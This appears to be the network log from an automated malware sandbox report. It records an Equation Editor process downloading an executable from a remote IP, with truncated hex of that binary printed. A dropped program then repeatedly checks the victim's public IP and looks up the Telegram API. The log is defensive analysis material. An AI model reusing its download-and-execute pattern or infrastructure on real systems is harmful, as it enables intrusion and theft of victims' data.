                                                Sep 26, 2024 09:25:32.053826094 CEST8.8.8.8192.168.2.220x681fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.393940926 CEST8.8.8.8192.168.2.220xfb7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.393940926 CEST8.8.8.8192.168.2.220xfb7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.393940926 CEST8.8.8.8192.168.2.220xfb7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.393940926 CEST8.8.8.8192.168.2.220xfb7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.393940926 CEST8.8.8.8192.168.2.220xfb7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.393940926 CEST8.8.8.8192.168.2.220xfb7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.412592888 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.412592888 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.412592888 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.412592888 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.412592888 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.412592888 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.424607992 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.424607992 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.424607992 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.424607992 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.424607992 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.424607992 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:38.147402048 CEST8.8.8.8192.168.2.220xec33No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:38.147402048 CEST8.8.8.8192.168.2.220xec33No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:39.008960962 CEST8.8.8.8192.168.2.220xc07cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • reallyfreegeoip.org
                                                • api.telegram.org
                                                • 66.63.187.123
                                                • checkip.dyndns.org

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.224916366.63.187.123803272C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 09:25:00.684156895 CEST320OUTGET /txt/HgCppsoKmxQq.exe HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: 66.63.187.123
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:01.423650026 CEST1236INHTTP/1.1 200 OK
                                                Server: nginx/1.26.2
                                                Date: Thu, 26 Sep 2024 07:25:01 GMT
                                                Content-Type: application/x-msdos-program
                                                Content-Length: 704000
                                                Connection: keep-alive
                                                Last-Modified: Thu, 26 Sep 2024 03:29:52 GMT
                                                ETag: "abe00-622fd59fdddc0"
                                                Accept-Ranges: bytes
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a1 d4 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 98 0a 00 00 24 00 00 00 00 00 00 76 b6 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 b6 0a 00 4f 00 00 00 00 c0 0a 00 ac 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf0$v @ @$O H.text| `.rsrc "@@.reloc@BXHY\5,&0|((}{(}(}(}(}(}(}(}*0!( lY mZ(X+*0ms} }#cA} ig}#c} 's}s}}}((8>%,os{{(}
                                                Sep 26, 2024 09:25:01.423692942 CEST1236INData Raw: 7b 03 00 00 04 02 7b 0b 00 00 04 28 20 00 00 0a 7d 0b 00 00 04 02 08 7b 01 00 00 04 02 7b 0c 00 00 04 28 21 00 00 0a 7d 0c 00 00 04 02 08 7b 03 00 00 04 02 7b 0d 00 00 04 28 22 00 00 0a 7d 0d 00 00 04 02 02 7b 0e 00 00 04 08 7b 08 00 00 04 28 23
                                                Data Ascii: {{( }{{(!}{{("}{{(#-{+{}{{($-{+{}{{o%Xi:*0#$@Yl#$@(&('((i}
                                                Sep 26, 2024 09:25:01.423712969 CEST1236INData Raw: 11 11 6b 11 12 6b 6f 2b 00 00 0a 00 03 28 3d 00 00 0a 11 11 6b 11 14 6b 11 11 11 08 59 6b 11 14 6b 6f 2b 00 00 0a 00 03 28 3d 00 00 0a 11 11 6b 11 15 6b 11 11 11 08 58 6b 11 15 6b 6f 2b 00 00 0a 00 00 11 10 17 58 13 10 11 10 02 7b 09 00 00 04 08
                                                Data Ascii: kko+(=kkYkko+(=kkXkko+X{o8:8# @#y@Yl[(@( #@2+lX{o88\{o9o:{Y ZY[l{o9o:{
                                                Sep 26, 2024 09:25:01.423724890 CEST672INData Raw: 00 00 06 0a 06 04 7d 58 00 00 04 06 03 7d 59 00 00 04 00 02 7b 09 00 00 04 6f 47 00 00 0a 28 01 00 00 2b 06 fe 06 43 00 00 06 73 49 00 00 0a 6f 4a 00 00 0a 0b 23 00 00 00 00 d0 12 63 c1 0c 00 07 6f 4b 00 00 0a 0d 2b 26 12 03 28 4c 00 00 0a 13 04
                                                Data Ascii: }X}Y{oG(+CsIoJ#coK+&(L{oM{il("(N-oO+*I3|02}(Ps(oQ(soQ*0+,
                                                Sep 26, 2024 09:25:01.423738003 CEST1236INData Raw: 0a 00 02 7b 2a 00 00 04 02 7b 13 00 00 04 7c 0f 00 00 04 28 19 00 00 0a 28 66 00 00 0a 6f 69 00 00 0a 00 02 7b 27 00 00 04 02 7b 13 00 00 04 7c 0e 00 00 04 28 6a 00 00 0a 17 59 6f 6b 00 00 0a 00 02 7b 2c 00 00 04 02 7b 13 00 00 04 7c 0f 00 00 04
                                                Data Ascii: {*{|((foi{'{|(jYok{,{|(jYok({%{|(l(foi{.{|(l(foi{)smon{*smon{'smoo
                                                Sep 26, 2024 09:25:01.423748970 CEST1236INData Raw: 00 00 02 00 1c 00 24 40 00 0f 00 00 00 00 13 30 04 00 3b 00 00 00 0b 00 00 11 00 02 16 7d 1e 00 00 04 02 7b 30 00 00 04 16 6f 86 00 00 0a 00 02 7b 32 00 00 04 02 7b 31 00 00 04 17 25 0a 6f 86 00 00 0a 00 06 6f 86 00 00 0a 00 02 03 04 28 11 00 00
                                                Data Ascii: $@0;}{0o{2{1%oo(*0;}{1o{2{0%oo(*0;}{2o{0{1%oo(*0
                                                Sep 26, 2024 09:25:01.423810005 CEST1236INData Raw: 24 00 00 04 1c 16 1c 16 73 5e 00 00 0a 6f 8d 00 00 0a 00 02 7b 24 00 00 04 72 99 00 00 70 6f 60 00 00 0a 00 02 7b 24 00 00 04 1f 5e 1f 20 73 59 00 00 0a 6f 8e 00 00 0a 00 02 7b 24 00 00 04 1f 0a 6f 8f 00 00 0a 00 02 7b 24 00 00 04 72 a7 00 00 70
                                                Data Ascii: $s^o{$rpo`{$^ sYo{$o{$rpo3{% s0o1{%s^o{%C%soh{%C%sog{%rpo`{%l&sYo{%o
                                                Sep 26, 2024 09:25:01.423821926 CEST672INData Raw: 00 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 2b 00 00 04 1c 16 1c 16 73 5e 00 00 0a 6f 8d 00 00 0a 00 02 7b 2b 00 00 04 72 db 01 00 70 6f 60 00 00 0a 00 02 7b 2b 00 00 04 1f 4b 1f 20 73 59 00 00 0a 6f 8e 00 00 0a 00 02 7b 2b 00 00 04 1f 14 6f 8f 00
                                                Data Ascii: s0o1{+s^o{+rpo`{+K sYo{+o{+rpo3{,o{,o%rp%rp%rp%rp%rp%rp%r)p%r3p%rAp%rUp%rep%rwpo{,
                                                Sep 26, 2024 09:25:01.423832893 CEST1236INData Raw: 69 00 00 0a 00 02 7b 2f 00 00 04 17 6f 90 00 00 0a 00 02 7b 2f 00 00 04 20 dc 02 00 00 20 75 04 00 00 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 2f 00 00 04 1c 16 1c 16 73 5e 00 00 0a 6f 8d 00 00 0a 00 02 7b 2f 00 00 04 72 17 02 00 70 6f 60 00 00 0a
                                                Data Ascii: i{/o{/ us0o1{/s^o{/rpo`{/^ sYo{/o{/rpo3{0o{0 P s0o1{0s^o{0r%po`{0 p-sYo{0
                                                Sep 26, 2024 09:25:01.423842907 CEST224INData Raw: 0a 00 02 7b 36 00 00 04 17 6f 95 00 00 0a 00 02 7b 36 00 00 04 02 fe 06 11 00 00 06 73 6d 00 00 0a 6f 99 00 00 0a 00 02 7b 37 00 00 04 17 6f 90 00 00 0a 00 02 7b 37 00 00 04 1f 40 6f 97 00 00 0a 00 02 7b 37 00 00 04 28 83 00 00 0a 6f 98 00 00 0a
                                                Data Ascii: {6o{6smo{7o{7@o{7(o{7 7s0o1{7s^o{7rIpo`{7U$sYo{7o{7rSpo3{7o{7
                                                Sep 26, 2024 09:25:01.428469896 CEST1236INData Raw: 00 06 73 6d 00 00 0a 6f 99 00 00 0a 00 02 7b 38 00 00 04 17 6f 90 00 00 0a 00 02 7b 38 00 00 04 20 60 01 00 00 20 de 04 00 00 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 38 00 00 04 1c 16 1c 16 73 5e 00 00 0a 6f 8d 00 00 0a 00 02 7b 38 00 00 04 72 59
                                                Data Ascii: smo{8o{8 ` s0o1{8s^o{8rYpo`{8 sYo{8o{8ripo3{9 < s0o1{9s^o{9C%sog{9r}po`{9


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.2249164132.226.247.73803520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 09:25:06.189268112 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:10.380408049 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: bb01a116122b8bc35260dcd552832768
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:10.403357983 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Sep 26, 2024 09:25:10.608175039 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: c776b5e5ef88820a402a7ab429e8a1b2
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:11.511487007 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Sep 26, 2024 09:25:11.716519117 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:11 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 05e732c011499b02e161f07b1175c7f5
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.2249167193.122.130.0803520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 09:25:12.540491104 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Sep 26, 2024 09:25:17.786223888 CEST745INHTTP/1.1 504 Gateway Time-out
                                                Date: Thu, 26 Sep 2024 07:25:17 GMT
                                                Content-Type: text/html
                                                Content-Length: 557
                                                Connection: keep-alive
                                                X-Request-ID: 650284524c11e72e7ee267930778dcb2
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                Sep 26, 2024 09:25:17.999521017 CEST745INHTTP/1.1 504 Gateway Time-out
                                                Date: Thu, 26 Sep 2024 07:25:17 GMT
                                                Content-Type: text/html
                                                Content-Length: 557
                                                Connection: keep-alive
                                                X-Request-ID: 650284524c11e72e7ee267930778dcb2
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.2249168158.101.44.242803520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 09:25:17.839169025 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:23.095289946 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 9484ad06c1a99fbd50a3a3b230e94863
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:23.195626020 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 9484ad06c1a99fbd50a3a3b230e94863
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.2249170193.122.6.168803520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 09:25:23.830612898 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:26.958578110 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:26 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e0144237c56e0703b2d41878e3d053cd
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:27.497669935 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:26 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e0144237c56e0703b2d41878e3d053cd
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:28.538409948 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:26 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e0144237c56e0703b2d41878e3d053cd
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.2249172193.122.130.0803520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 09:25:28.747968912 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:29.325105906 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:29 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: f38c427d48e67f08cfe2e83a742d2f2d
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:29.535538912 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:29 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: f38c427d48e67f08cfe2e83a742d2f2d
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.2249174132.226.8.169803520C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 09:25:30.070146084 CEST151OUTGET / HTTP/1.1
